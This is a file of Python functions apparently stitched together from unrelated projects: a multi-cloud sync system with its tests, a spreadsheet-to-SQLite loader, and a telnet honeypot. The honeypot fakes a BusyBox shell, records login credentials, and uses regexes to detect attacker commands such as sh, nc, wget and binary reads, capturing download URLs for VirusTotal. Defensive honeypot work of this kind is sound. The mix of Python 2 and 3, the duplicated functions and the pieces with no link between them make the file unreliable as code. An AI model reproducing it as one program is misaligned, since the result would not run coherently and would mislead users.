def test_blob_walk(metasync, opts):
    "test creating/walking a blob dir"
    opts.notree = True
    bs = blobs.BlobStore2(metasync)
    root = blobs.BlobDir2(bs)

    # generate sample tree
    for i in range(1, 3):
        parent_dir = blobs.BlobDir2(bs)
        root.add("dir-%s" % i, parent_dir)
        for j in range(1, 4):
            child_dir = blobs.BlobDir2(bs)
            parent_dir.add("sub-%s" % j, child_dir)
            for k in range(1, 5):
                blob_file = blobs.BlobFile2(bs)
                child_dir.add("file-%s" % k, blob_file)

    # count all entries
    cnt = 0
    for (name, blob) in root.walk():
        dbg.dbg("%-18s: %s" % (name, blob.hv))
        cnt += 1
    # 2 dirs x 3 subdirs x 4 files, plus the 6 subdirs and 2 dirs themselves
    assert cnt == 2 * 3 * 4 + 2 * 3 + 2

def req(self, method, url, files=None, params=None, headers=None, retries=3):
    r = None
    if method == "GET":
        r = requests.get(url, files=files, params=params, headers=headers)
    elif method == "POST":
        r = requests.post(url, files=files, params=params, headers=headers)
    else:
        raise ValueError("Unknown Method: " + str(method))
    if r.status_code == 204:
        if retries > 0:
            dbg("API Quota exceeded. Retrying in 61 seconds.")
            time.sleep(61)
            return self.req(method, url, files, params, headers, retries - 1)
        else:
            dbg("API Quota exceeded. Giving up.")
            return None
    else:
        return r

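# A minimal standalone sketch of the quota-retry idea in req() above, written
# against plain `requests` (the helper name and its defaults are assumptions,
# not part of the original): sleep and retry while the API answers 204, and
# give up with None once the retries run out.
import time
import requests

def get_with_quota_retry(url, params=None, retries=3, wait=61):
    """GET url; on HTTP 204 (quota exceeded) sleep `wait` seconds and
    retry, returning None after `retries` failed attempts."""
    for _ in range(retries + 1):
        r = requests.get(url, params=params)
        if r.status_code != 204:
            return r
        time.sleep(wait)
    return None
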
def get_logs(self, path, last_clock):
    import portalocker
    import tailer
    import time

    pn = self.get_path(path)
    with open(pn, "r+") as log:
        while True:
            try:
                portalocker.lock(log, portalocker.LOCK_EX)
                break
            except:
                dbg.dbg("lock failed")
                time.sleep(0.1)
        curtime = int(util.current_sec())
        lines = tailer.tail(log, 20)

        ret = []
        if last_clock is None:
            last_clock = 0
        for line in lines:
            sp = line.strip().split("\t")
            if int(sp[0]) < last_clock:
                continue
            #log = {
            #    'time': eval(sp[0]),
            #    'message': sp[1]
            #}
            #ret.append(log)
            ret.append(sp[1])
    return ret, curtime

def loop(self):
    dbg("New Session")
    dbg("Setting timeout to " + str(self.timeout) + " seconds")
    self.sock.settimeout(self.timeout)
    self.test_opt(1)
    #self.test_naws()
    #if self.test_opt(1, True):
    #    self.send_string("123\r\n")
    #    self.recv_string()
    #    self.test_opt(1, False)
    # fake login: any username/password pair is accepted
    self.send_string("Hello. Hint: Try any username/password\r\n\r\nLogin: ")
    u = self.recv_line()
    self.send_string("Password: ")
    p = self.recv_line()
    self.send_string("\r\nWelcome to EmbyLinux 3.13.0-24-generic\r\n")
    dbg("USER " + u)
    dbg("PASS " + p)
    while True:
        self.send_string(" # ")
        l = self.recv_line()
        dbg(" # " + l)
        self.text = self.text + " # " + l + "\r\n"
        self.shell(l)

def __init__(self, services, block, blockList):
    Thread.__init__(self)
    self.clientid = str(util.gen_uuid())
    self.proposer = Proposer(self.clientid, services, block, blockList)
    self.latency = 0
    self.master = False
    dbg.dbg("Client %s" % self.clientid)

def update(self, path, content):
    """Update the file

    Args and returns same as put
    """
    dbg.dbg(path)
    path = util.format_path(path)
    metadata = self._path_to_metadata(path)
    file_id = metadata['id']

    uri = GoogleAPI.UPLOAD_URL + '/files/%s?uploadType=media' % file_id
    headers = {
        'Content-Type': 'text/plain',
        'Content-Length': len(content),
    }
    for retry_num in xrange(self._num_retries + 1):
        resp, data = self.service._http.request(uri, method='PUT',
                                                body=content, headers=headers)
        if resp.status < 500:
            break
    if resp.status >= 300:
        raise errors.HttpError(resp, data, uri=uri)
    if resp.status == 200:
        drive_file = json.loads(data)
        self._cache_metadata(path, drive_file)
        return True
    else:
        return False

def __init__(self, services, path):
    Thread.__init__(self)
    random.seed(time.time())
    self.clientid = str(util.gen_uuid())
    self.proposer = Proposer(self.clientid, services, path)
    self.latency = 0
    self.master = False
    dbg.dbg("Client %s" % self.clientid)

def recv(self):
    byte = ord(self.sock.recv(1))
    if byte in Telnetd.cmds:
        dbg("RECV " + str(Telnetd.cmds[byte]))
    else:
        pass
        #dbg("RECV " + str(byte))
    return byte

def run(self):
    beg = time.time()
    val = self.proposer.propose(self.clientid).strip()
    end = time.time()
    self.latency = max(end - beg, self.latency)
    if val == self.clientid:
        self.master = True
    dbg.dbg("Proposal result: %s (%s)" % (val, self.latency))

def run(self):
    beg = time.time()
    val = self.proposer.propose2(self.clientid).strip()
    end = time.time()
    self.latency = max(end - beg, self.latency)
    if val == self.clientid:
        self.master = True
    dbg.dbg("Proposal result: %s (%s)" % (val, self.latency))

def __init__(self, output, remote_addr):
    dbg("New Session")
    self.output = output
    self.remote_addr = remote_addr
    # Files already committed
    self.files = []

def test_opt(self, opt, do=True):
    dbg("TEST " + str(opt))
    self.send(Telnetd.IAC)
    if do:
        self.send(Telnetd.DO)
    else:
        self.send(Telnetd.DONT)
    self.send(opt)

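# For reference, the three bytes test_opt() emits form the standard telnet
# negotiation triplet (constant values from RFC 854/857; option 1 is ECHO):
#   IAC(255)  DO(253)|DONT(254)  <option>
# so test_opt(1) sends 0xFF 0xFD 0x01, i.e. "IAC DO ECHO".
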
def __init__(self, services, maxthreads=None):
    self.srv_threads = {}
    # XXX. inflexible in dealing with changes of services (list)
    if maxthreads is None or cpu_count() > maxthreads:
        maxthreads = cpu_count()
    nthreads = maxthreads - len(services)
    for srv in services:
        self.srv_threads[srv] = ServiceThread(srv)
    # threadpool thread number?
    dbg.dbg("init scheduler: %s" % nthreads)
    self.pool = ThreadPool(min(nthreads, 3 * len(services)))

def need(self, byte_need):
    byte = ord(self.sock.recv(1))
    #if byte in Telnetd.cmds:
    #    dbg("RECV " + str(Telnetd.cmds[byte]))
    #else:
    #    dbg("RECV " + str(byte))
    if byte != byte_need:
        dbg("BAD PROTOCOL ERROR. EXIT.")
        raise ValueError()
    return byte

def handle(self):
    try:
        conn, addr = self.sock.accept()
        dbg("Client connected at " + str(addr))
        sess = TelnetSess(self, conn, addr)
        sess.loop()
    except:
        traceback.print_exc()
    conn.close()
    dbg("Client connection closed")

def run(self):
    self.sock.bind((self.host, self.port))
    self.sock.listen(10)
    self.sock.settimeout(None)
    dbg("Socket open on " + str(self.host) + ":" + str(self.port))
    while self.do_run:
        try:
            self.handle()
        except:
            traceback.print_exc()
    self.sock.close()
    dbg("Socket Closed")

def bstore_sync(self, hashnames):
    dbg.dbg("need to sync: %s..@%d" % (hashnames[0], len(hashnames)))

    def __put_next(srv, hashdic, hashdic_left, allset, key, lock):
        dbg.job("submitted to: %s" % srv)
        while True:
            lock.acquire()
            if len(hashdic[key]) == 0 or len(allset) == 0:
                lock.release()
                break
            next = hashdic[key].pop()
            if next in allset:
                allset.remove(next)
            else:
                hashdic_left[key].append(next)
                next = None
            lock.release()
            if next is not None:
                with open(self.get_local_obj_path(next), "rb") as f:
                    blob = f.read()
                for tr in self.translators:
                    blob = tr.put(blob)
                # XXX HACK
                backoff = 0.5
                remote_path = self.get_remote_obj_path(next)
                while not srv.put(remote_path, blob):
                    dbg.dbg("backoff %s" % srv)
                    time.sleep(backoff)
                    backoff *= 2

    nthreads = self.options.nthreads if self.options is not None else 2
    hashdic = {}
    hashdic_left = {}
    allset = set()
    lock = threading.Lock()

    for srv in self.srvmap:
        hashdic[srv] = []
        hashdic_left[srv] = []

    for hashname in hashnames:
        allset.add(hashname)
        for i in self.mapping.get_mapping(hashname):
            hashdic[i].append(hashname)

    for srv in hashdic:
        for i in range(nthreads):
            self.scheduler.submit(self.srvmap[srv], False, __put_next,
                                  hashdic, hashdic_left, allset, srv, lock)

    self._join()
    return hashdic_left

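# The upload loop in __put_next() above retries srv.put() with doubled
# sleeps. A generic sketch of that exponential-backoff pattern (the helper
# name and the cap are illustrative assumptions, not from the original):
import time

def retry_with_backoff(op, initial=0.5, cap=60.0):
    """Call op() until it returns a truthy value, doubling the sleep
    between attempts up to `cap` seconds, then return the result."""
    backoff = initial
    while True:
        result = op()
        if result:
            return result
        time.sleep(backoff)
        backoff = min(backoff * 2, cap)
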
def run(self):
    self.sock.bind((self.host, self.port))
    self.sock.listen(10)
    dbg("Socket open on port " + str(self.port))
    while self.do_run:
        try:
            self.handle()
        except:
            traceback.print_exc()
        # ONLY HANDLE ONE CLIENT
        # self.stop()
    self.sock.close()
    dbg("Socket Closed")

def append(self, path, msg):
    import portalocker
    import time

    pn = self.get_path(path)
    with open(pn, "a+") as log:
        while True:
            try:
                portalocker.lock(log, portalocker.LOCK_EX)
                break
            except:
                dbg.dbg("lock failed")
                time.sleep(0.1)
        log.write("%d\t%s\n" % (util.current_sec(), msg))

def _path_to_metadata(self, path, isfolder=False):
    metadata = OneDriveMetaData.getInstance().path_to_metadata(path, isfolder)
    if not metadata:
        backoff = 0.5
        while True:
            try:
                metadata = self.search(path)
                break
            except:
                dbg.dbg("onedrive, search backoff")
                time.sleep(backoff)
                backoff *= 2
    return metadata

def rm(self, name):
    self._load()
    # remove only if we have such a file
    if name in self._entries:
        del self._entries[name]
        self._dirty = True
        self._sorted = None
        # if the one in dirties
        if name in self._dirties:
            del self._dirties[name]
    else:
        dbg.dbg("we don't have such a file")

def append(self, path, msg):
    import portalocker
    import time

    pn = self.get_path(path)
    util.mkdirs(os.path.dirname(pn))
    with open(pn, "a+") as log:
        while True:
            try:
                portalocker.lock(log, portalocker.LOCK_EX)
                break
            except:
                dbg.dbg("lock failed")
                time.sleep(0.1)
        log.write("%d\t%s\n" % (util.current_sec(), msg))

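# The spin-until-locked idiom used by append() and get_logs() above, pulled
# out as a standalone helper (a sketch: catching portalocker.LockException
# narrowly is an assumption -- the original uses a bare except):
import time
import portalocker

def lock_blocking(fileobj, delay=0.1):
    """Acquire an exclusive lock on fileobj, retrying every `delay`
    seconds until portalocker grants it."""
    while True:
        try:
            portalocker.lock(fileobj, portalocker.LOCK_EX)
            return
        except portalocker.LockException:
            time.sleep(delay)
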
def _load(self):
    if not self.check_sanity():
        return
    if not os.path.exists(AUTH_DIR):
        os.mkdir(AUTH_DIR)

    # load config
    self.config = util.load_config(self.path_conf)
    self.namespace = self.config.get("core", "namespace")
    self.clientid = self.config.get("core", "clientid")

    # load services from config
    self.srvmap = {}
    for tok in self.config.get("backend", "services").split(","):
        srv = services.factory(tok)
        self.srvmap[srv.sid()] = srv

    self.nreplicas = int(self.config.get("backend", "nreplicas"))

    nthreads = self.options.nthreads if self.options is not None else 2
    self.scheduler = Scheduler(self.services, (nthreads + 1) * len(self.srvmap))

    # load translator pipe
    if self.is_encypted():
        self.translators.append(translators.TrEncrypt(self))

    # TODO. for integrity option
    # if self.is_signed():
    #     self.translators.append(TrSigned(self))

    beg = time.time()
    if os.path.exists(self.get_path("mapping.pcl")):
        with open(self.get_path("mapping.pcl")) as f:
            self.mapping = pickle.load(f)
    else:
        mapconfig = []
        for srv in self.services:
            mapconfig.append((srv.sid(), srv.info_storage() / GB))
        hspacesum = sum(map(lambda x: x[1], mapconfig))
        hspace = max(hspacesum + 1, 1024)
        self.mapping = DetMap2(mapconfig, hspace=hspace, replica=self.nreplicas)
        self.mapping.pack()
        with open(self.get_path("mapping.pcl"), "w") as f:
            pickle.dump(self.mapping, f)
    end = time.time()
    dbg.time("mapping init %s" % (end - beg))
    dbg.dbg("head: %s", self.get_head_name())

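# Sketch of the mapping.pcl round-trip above with a stand-in object (the
# original pickles a DetMap2 in text mode, which is Python-2 specific; this
# sketch uses binary mode so it also runs on Python 3):
import pickle

mapping = {"dropbox": [0, 3], "google": [1, 2]}  # placeholder, not DetMap2
with open("mapping.pcl", "wb") as f:
    pickle.dump(mapping, f)
with open("mapping.pcl", "rb") as f:
    assert pickle.load(f) == mapping
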
def vt_work(self):
    dbg("Virustotal uploader started")
    while True:
        f = self.vt_queue.get()
        if f == "!STOP!":
            self.vt_queue.task_done()
            dbg("Stopping worker")
            return
        # skip files VirusTotal has already scanned; upload the rest
        scan = self.vt.query_hash_sha256(f["sha256"])
        if not scan:
            self.vt.upload_file(f["file"], f["name"])
        self.vt_queue.task_done()

def load(f, sheet=None):
    dbg("loading spreadsheet...")
    if sheet is None:
        sheet = 0
    x = xlrd.open_workbook(f)
    if type(sheet) == type('string'):
        sh = x.sheet_by_name(sheet)
    elif type(sheet) == type(1):
        sh = x.sheet_by_index(sheet)
    else:
        bail('bugger all, I dunno', err=2)
    dbg("spreadsheet loaded")
    return sh

def handle(self):
    conn = False
    try:
        conn, addr = self.sock.accept()
        # dbg("Client connected at " + str(addr) + " - [" + str(addr[0]) + "]")
        dbg("Client connected at [" + str(addr[0]) + "]")
        if self.ipfilter.is_allowed(addr[0]):
            self.ipfilter.add_ip(addr[0])
            sess = TelnetSess(self, conn, addr)
            start_new_thread(sess.loop, ())
        else:
            dbg("Connection limit for " + addr[0] + " exceeded, closing")
            conn.close()
    except:
        traceback.print_exc()

def shell(self, l):
    sh_regex = re.compile(".*sh\\s*(;|$)")
    nc_regex = re.compile(".*nc\\s*(;|$)")
    wget_regex = re.compile(".*wget\\s*(;|$)")
    dd_regex = re.compile(".*dd bs=52 count=1 if=.s.*")
    cat_regex = re.compile(".*cat .s.*cp /bin/echo .s.*")
    mount_regex = re.compile(".*cat /proc/mounts.*")
    elfcat_regex = re.compile(".*cat /bin/echo.*")
    token_regex = re.compile(".*/bin/busybox ([A-Z]+).*")
    downl_regex = re.compile(".*wget (?:-[a-zA-Z] )?(http[^ ;><&]*).*")

    if mount_regex.match(l):
        self.send_string(
            "/dev/root /rom squashfs ro,relatime 0 0\r\n"
            "proc /proc proc rw,nosuid,nodev,noexec,noatime 0 0\r\n"
            "sysfs /sys sysfs rw,nosuid,nodev,noexec,noatime 0 0\r\n"
            "tmpfs /tmp tmpfs rw,nosuid,nodev,noatime 0 0\r\n"
            "/dev/mtdblock10 /overlay jffs2 rw,noatime 0 0\r\n"
            "overlayfs:/overlay / overlay rw,noatime,lowerdir=/,upperdir=/overlay/upper,workdir=/overlay/work 0 0\r\n"
            "tmpfs /dev tmpfs rw,nosuid,relatime,size=512k,mode=755 0 0\r\n"
            "devpts /dev/pts devpts rw,nosuid,noexec,relatime,mode=600 0 0\r\n"
            "debugfs /sys/kernel/debug debugfs rw,noatime 0 0\r\n")
    if nc_regex.match(l):
        self.send_string(
            "BusyBox v1.24.2 () multi-call binary.\r\n\r\n"
            "Usage: nc [IPADDR PORT]\r\n\r\nOpen a pipe to IP:PORT\r\n")
    if sh_regex.match(l):
        self.send_string(
            "\r\n\r\nBusyBox v1.24.2 () built-in shell (ash)\r\n\r\n")
    if wget_regex.match(l):
        self.send_string("Usage: wget [options] <URL>\r\nOptions:\r\n")
    if dd_regex.match(l) or elfcat_regex.match(l):
        # Select random binary header, so we get multiple samples
        bin = ELF_BINS[random.randint(0, len(ELF_BINS) - 1)]
        self.send_string(bin)
        self.send_string("41+0 records in\r\n1+0 records out")
    if cat_regex.match(l):
        self.send_string("cat: can't open '.s': No such file or directory")
    m = token_regex.match(l)
    if m:
        token = m.group(1)
        self.send_string(token + ": applet not found\r\n")
    m = downl_regex.match(l)
    if m:
        url = m.group(1)
        dbg("DOWNLOAD URL " + url)
        self.serv.samples.put_url(url, self.db_id)

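# Quick illustration of the two capturing regexes above (the command strings
# are made-up attacker input, not from the original):
import re

token_regex = re.compile(".*/bin/busybox ([A-Z]+).*")
downl_regex = re.compile(".*wget (?:-[a-zA-Z] )?(http[^ ;><&]*).*")

print(token_regex.match("/bin/busybox MIRAI").group(1))
# -> MIRAI
print(downl_regex.match("wget http://host.example/bot.sh; sh bot.sh").group(1))
# -> http://host.example/bot.sh
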
def test_blob(metasync, opts):
    "test blob-related operations"
    test_init(metasync, opts)
    bs = blobs.BlobStore2(metasync)

    blob_dir = blobs.BlobDir2(bs)
    # empty dir
    assert blob_dir.hv is not None \
        and len(blob_dir.entries) == 0

    # add three dirs and a file
    hv0 = blob_dir.hv
    blob_dir.add("dir1", blobs.BlobDir2(bs))
    blob_dir.add("dir2", blobs.BlobDir2(bs))
    blob_dir.add("dir3", blobs.BlobDir2(bs))
    blob_dir.add("file", blobs.BlobFile2(bs))
    hv3 = blob_dir.hv
    assert hv0 != hv3 \
        and len(blob_dir.entries) == 4

    for (name, blob) in blob_dir.entries.iteritems():
        # empty dir
        if isinstance(blob, blobs.BlobDir2):
            assert blob.hv == hv0
        # empty file
        if isinstance(blob, blobs.BlobFile2):
            assert blob.hv != hv0

    # delete one
    blob_dir.rm("dir2")
    hv2 = blob_dir.hv
    assert hv3 != hv2 \
        and len(blob_dir.entries) == 3

    dbg.dbg("hv: %s\n%s" % (hv2, blob_dir.dump()))

    # test store/load
    blob_dir.store()
    # loaded from disk
    loaded_blob = blobs.BlobDir2(bs, hv2)
    assert loaded_blob.dump() == blob_dir.dump()

def restore_from_master(self):
    root = self.get_root_blob()
    dbg.dbg("restore")
    for name, blob in root.walk():
        pn = os.path.join(self.path_root, name)
        if blob.thv == "F":
            content = blob.read()
            util.write_file(pn, content.getvalue())
            content.close()
        elif blob.thv == "m":
            content = blob.read()
            util.write_file(pn, content)
        elif blob.thv == "D" or blob.thv == "M":
            try:
                os.mkdir(pn)
            except:
                pass
    return True

def upload_file(self, f, fname):
    dbg("Uploading file " + f)
    fp = open(f, 'rb')
    params = {'apikey': self.api_key}
    files = {'file': (fname, fp)}
    headers = {"User-Agent": self.user_agent}
    res = self.req("POST", self.url + 'file/scan',
                   files=files, params=params, headers=headers)
    if res is None:
        # quota retries exhausted in req()
        fp.close()
        return None
    json = res.json()
    fp.close()
    if json["response_code"] == 1:
        dbg("Uploading finished. See " + str(json["permalink"]))
        return json
    else:
        return None

def main(args):
    p = OptionParser()
    p.add_option("-d", "--dbfile", dest="dest",
                 default="./myspreadsheet.db", help="destination file")
    p.add_option("-t", "--table", dest="table", default="main",
                 help="name of table")
    p.add_option("-p", "--port", dest="port", default=2304, help="port")
    p.add_option("-o", "--origin", dest="origin", default="a,1",
                 help="the origin (not yet implemented)")
    p.add_option("-x", "--origin-x", dest="xorigin", default="a",
                 help="x origin")
    p.add_option("-y", "--origin-y", dest="yorigin", default="1",
                 help="y origin")
    p.add_option("-s", "--sheet=", dest="sheet", default=0,
                 help="sheet to load if not the first")
    p.add_option("-r", "--run-sqlite", dest="run",
                 help="run sqlite upon load")
    p.add_option("-w", "--start-webserver", dest="web",
                 help="start webserver upon load")
    # this is wrong, but I'm not sure what would be right
    p.add_option("-c", "--force-column-names", dest='force_colnames',
                 action='store_true', default=False,
                 help="don't even try to sniff column names")
    (options, args) = p.parse_args()
    dbg("options: %s; args: %s" % (options, args))
    if len(args) != 1:
        bail("need exactly one non-flag argument")
    s = load(args[0])
    cols = get_colnames(s, force_colnames=options.force_colnames)
    print("%s" % (cols,))
    from sniffer import sniff_types
    defn = sniff_types(s, cols, fast=True)
    conn = setup_db(options.dest, defn, options.table)
    populate_db(conn, s, options.table, defn)
    dbg("database populated")
    if options.web:
        subprocess.getstatusoutput("python ./web.py")

def setup_db(dest, cols, table):
    import sqlite3
    conn = sqlite3.connect(dest)
    ct0 = """CREATE TABLE %s (""" % (table,)
    ctX = ["%s %s" % (col[0], col[1]) for col in cols]
    ctN = """)"""
    ct = "%s %s %s" % (ct0, ", ".join(ctX), ctN)
    dbg(ct)
    c = conn.cursor()
    try:
        c.execute(ct)
    except sqlite3.OperationalError as oe:
        dbg("that was bad: %s" % (oe,))
        bail("", err=2)
    c.close()
    return conn

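# Worked example of the CREATE TABLE string setup_db() assembles (the column
# definitions here are illustrative, not from the original):
cols = [("name", "text"), ("qty", "integer")]
table = "main"
ct = "%s %s %s" % ("CREATE TABLE %s (" % (table,),
                   ", ".join("%s %s" % (c[0], c[1]) for c in cols),
                   ")")
print(ct)  # CREATE TABLE main ( name text, qty integer )
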
def test_blob_load(metasync, opts):
    "test loading file/dir from a path"
    _init_disk_metasync(metasync, opts)
    bs = blobs.BlobStore2(metasync)

    # /a/b/c
    dirp = metasync.get_local_path("a", "b", "c")
    util.mkdirs(dirp)

    # /a/b/c/file
    pn = os.path.join(dirp, "file")
    util.create_random_file(pn, 5 * KB)

    blob = bs.load_dir(dirp)
    blob.add("file", bs.load_file(pn))

    # count how many blobs
    root = bs.get_root_blob()
    dbg.dbg("%-15s: %s" % ("/", root.hv))

    cnt = 0
    for (name, blob) in bs.walk():
        dbg.dbg("%-15s: %s" % (name, blob.hv))
        cnt += 1
    assert cnt == len(["a", "b", "c", "file"])

    # flush all new blobs
    assert len(os.listdir(metasync.path_objs)) == 0
    root.store()
    assert len(os.listdir(metasync.path_objs)) == 6

    # "." => root
    test_blob = bs.load_dir(metasync.get_local_path("."))
    assert test_blob == root
    test_blob = bs.load_dir(metasync.get_local_path(""))
    assert test_blob == root

def populate_db(conn, sh, table, defn):
    c = conn.cursor()
    # first = 1 will change when we implement origin
    first = 1
    # tmpl0_0 = """INSERT INTO %s (""" % (table,)
    tmpl0_0 = """INSERT INTO %s VALUES (""" % (table,)
    tmplA_slots = ", ".join(['?' for cell in sh.row(first)])
    tmplA_vals = []
    tmpl0_1 = """) VALUES ("""
    tmplB_slots = []
    tmplB_vals = []
    tmplN = """)"""
    print("%s" % (defn,))
    tmpl = "%s %s %s" % (tmpl0_0, tmplA_slots, tmplN)
    dbg("tmpl: %s" % (tmpl,))
    dbg("now working")
    for idx in range(first, sh.nrows):
        row = sh.row(idx)
        #tmplA_slots = "?"
        #tmplB_values = "?"
        vals = tuple([cell.value for cell in row])
        conn.execute(tmpl, vals)
        #dbg("did something")
        if idx == 0:
            continue
        conn.commit()

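# Minimal runnable sketch of the parameterized-insert pattern populate_db()
# uses, against an in-memory database (the table and rows are made up):
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE main ( name text, qty integer )")
tmpl = "INSERT INTO main VALUES ( %s )" % ", ".join("?" for _ in range(2))
for row in [("ham", 2), ("eggs", 12)]:
    conn.execute(tmpl, row)
conn.commit()
print(conn.execute("SELECT * FROM main").fetchall())
# -> [('ham', 2), ('eggs', 12)]
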
def try_merge(self, head_history, master_history):
    # this needs to be fixed.
    dbg.dbg("Trying to merge")
    # we may need to cache the last branched point
    common = self.get_common_ancestor(head_history, master_history)
    dbg.dbg("%s %s %s", head_history[0], master_history[0], common)
    common = self.blobstore.get_blob(common, "D")
    head = self.get_root_blob()
    master = self.blobstore.get_blob(master_history[0], "D")
    added1 = head.diff(common)
    added2 = master.diff(common)

    def intersect(a, b):
        return list(set(a) & set(b))

    if len(intersect(added1.keys(), added2.keys())) != 0:
        dbg.err("both modified--we need to handle it")
        return False

    for i in added2.keys():
        path = os.path.join(self.path_root, i)
        dirblob = self.blobstore.load_dir(os.path.dirname(path), dirty=True)
        dirblob.add(os.path.basename(path), added2[i], dirty=False)

    # HACK, need to go through all the non-overlapped history.
    self.append_history(master.hv)
    head.store()
    self.append_history(head.hv)

    # HACK, need to be changed
    newblobs = self.blobstore.get_added_blobs()

    # push new blobs remotely
    self.bstore_sync(newblobs)
    self._join()

    return True

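# The conflict check in try_merge() reduces to set intersection over the
# paths changed on each side; a tiny worked example (paths are made up):
added1 = {"docs/a.txt": "hv1"}   # changed on head
added2 = {"src/b.py": "hv2"}     # changed on master
conflicts = set(added1.keys()) & set(added2.keys())
print(conflicts or "clean merge")  # -> clean merge
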
def bstore_download(self):
    # TODO, handle when R > 1
    lst = self.blobstore.list()
    #dbg.dbg("lst files:%s" % lst)
    lock = threading.Lock()

    def __get_next(srv, hash_dic, lock, allset, srvname):
        if len(hash_dic[srvname]) == 0:
            return
        while True:
            lock.acquire()
            try:
                next = hash_dic[srvname].pop()
                l = len(hash_dic[srvname])
                if l % 10 == 0:
                    dbg.dbg("%s left %d" % (srvname, l))
                if next not in allset:
                    allset.add(next)
                else:
                    next = None
            except:
                lock.release()
                break
            lock.release()
            if next is not None:
                remote_path = self.get_remote_obj_path(next)
                path = os.path.join(self.path_objs, next)
                with open(path, "wb") as f:
                    backoff = 0.5
                    while True:
                        blob = srv.get(remote_path)
                        if blob is not None:
                            break
                        dbg.dbg("back off %s" % srvname)
                        time.sleep(backoff)
                        backoff *= 2
                    for tr in reversed(self.translators):
                        blob = tr.get(blob)
                    f.write(blob)

    hash_dic = {}
    allset = set([])
    for srv in self.services:
        hash_dic[str(srv)] = []
        srvlist = srv.listdir(self.get_remote_obj_path())
        backoff = 1
        while srvlist is None:
            dbg.dbg("back off - listdir %s" % str(srv))
            time.sleep(backoff)
            srvlist = srv.listdir(self.get_remote_obj_path())
        for hashname in srvlist:
            if hashname in lst:
                #dbg.dbg("%s is already in bstore" % hashname)
                continue
            hash_dic[str(srv)].append(hashname)

    nthreads = self.options.nthreads if self.options is not None else 2
    for srv in self.services:
        dbg.dbg("%s:%d dn" % (str(srv), len(hash_dic[str(srv)])))
        ##HACK
        for i in range(nthreads):
            self.scheduler.submit(srv, False, __get_next,
                                  hash_dic, lock, allset, str(srv))

def cmd_clone(self, namespace, backend=None, encrypt_key=None):
    # if wrong target
    if self.check_sanity():
        return False

    # reset all the paths by including the namespace
    self.path_root = os.path.join(self.path_root, namespace)
    self.path_meta = os.path.join(self.path_root, META_DIR)
    self.path_conf = self.get_path("config")
    self.path_objs = self.get_path("objects")
    #self.path_head_history = self.get_path("head_history")

    if os.path.exists(self.path_root):
        dbg.err("%s already exists." % self.path_root)
        return False

    if backend is None:
        print "input one of the storage backends, (e.g., dropbox,google,box)"
        print "  for testing, use disk@/path (e.g., disk@/tmp)"
        backend = raw_input("> ")

    srv = services.factory(backend)
    self.namespace = namespace

    # create repo directory
    os.mkdir(self.path_root)
    os.mkdir(self.path_meta)
    os.mkdir(self.path_objs)

    curmaster = self.get_uptodate_master(False, srv)
    sp = curmaster.split(".")
    master = sp[0]
    seed = sp[1]
    seed = srv.get(self.get_remote_path("configs/%s" % seed))
    conf = util.loads_config(seed)

    # setup client specific info
    conf.set('core', 'clientid', util.gen_uuid())
    conf.set('core', 'encryptkey', _get_conf_encryptkey(encrypt_key))

    with open(self.path_conf, "w") as fd:
        conf.write(fd)

    self._load()

    beg = time.time()
    self.bstore_download()
    self._join()

    with open(self.get_head(), "w") as f:
        f.write(curmaster)
    with open(self.get_prev(), "w") as f:
        f.write(curmaster)

    # send my head to remote
    self._put_all(self.get_head(), self.get_remote_path(self.get_head_name()))
    self._put_all(self.get_prev(), self.get_remote_path(self.get_prev_name()))
    self._join()

    if master:
        ret = self.restore_from_master()
    end = time.time()
    dbg.dbg("clone: %ss" % (end - beg))
    return True

def on_moved(self, event):
    # XXX. not sure about its semantics, src/dst?
    # src_path => dest_path
    dbg.dbg(str(event))
    self.lastupdate = time.time()

def _debug_time(self, msg):
    cur = time.time()
    # dbg.paxos_time("[%s] %s: %s" % (self.clientid, msg, cur-self.starttime))
    dbg.dbg("[%s] %s: %s" % (self.clientid, msg, cur - self.starttime))

def update2(self):
    logs, new_clock = self.storage.get_logs2(self.path, self.clock)
    dbg.dbg('[%s] %s: %s' % (self.clientid, new_clock, logs))
    for msg in logs:
        self._commit_msg(msg)
    self.clock = new_clock
